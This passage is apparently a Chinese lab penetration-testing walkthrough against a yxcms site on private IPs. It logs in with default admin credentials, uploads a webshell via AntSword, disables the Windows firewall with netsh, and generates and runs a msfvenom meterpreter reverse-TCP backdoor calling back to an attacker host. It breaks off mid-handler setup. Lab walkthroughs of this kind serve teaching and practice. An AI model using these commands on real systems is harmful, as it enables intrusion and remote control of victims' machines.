#发现目标存在yxcms,尝试访问
#在首页发现了后台地址和管理员账密
进入yxcms后台
#网址输入:http://192.168.43.17/yxcms/index.php?r=admin
#admin
#123456
利用文件上传
蚁剑连接
#小提一下,马子上传了,不知道马子绝对路径怎么办?
#前面我们不是发现phpstudy文件夹下存在beifen.rar
#猜测应该是yxcms的备份文件
#解压之后,可通过查找acomment.php文件来确定文件上传的路径
#/yxcms/protected/apps/default/view/default
#URl:http://192.168.43.17/yxcms/protected/apps/default/view/default/cmsshell.php
至此,已经拿到Webshell
三、后渗透
后渗透阶段,当我们已经将小马上传到web服务器上时,可以用webshell管理工具进行下一步渗透了。
蚁剑终端关闭win7防火墙
#关闭win防火墙
netsh advfirewall set allprofiles state off
#查看防火墙配置状态
netsh advfirewall show allprofile state
msf生成exe并开启监听
#kali创建后门程序
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.43.33 LPORT=10888 -f exe -o 233.exe
#蚁剑上传233.exe
#蚁剑终端运行233.exe
#kali开启监听,设置sessions
use exp/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhos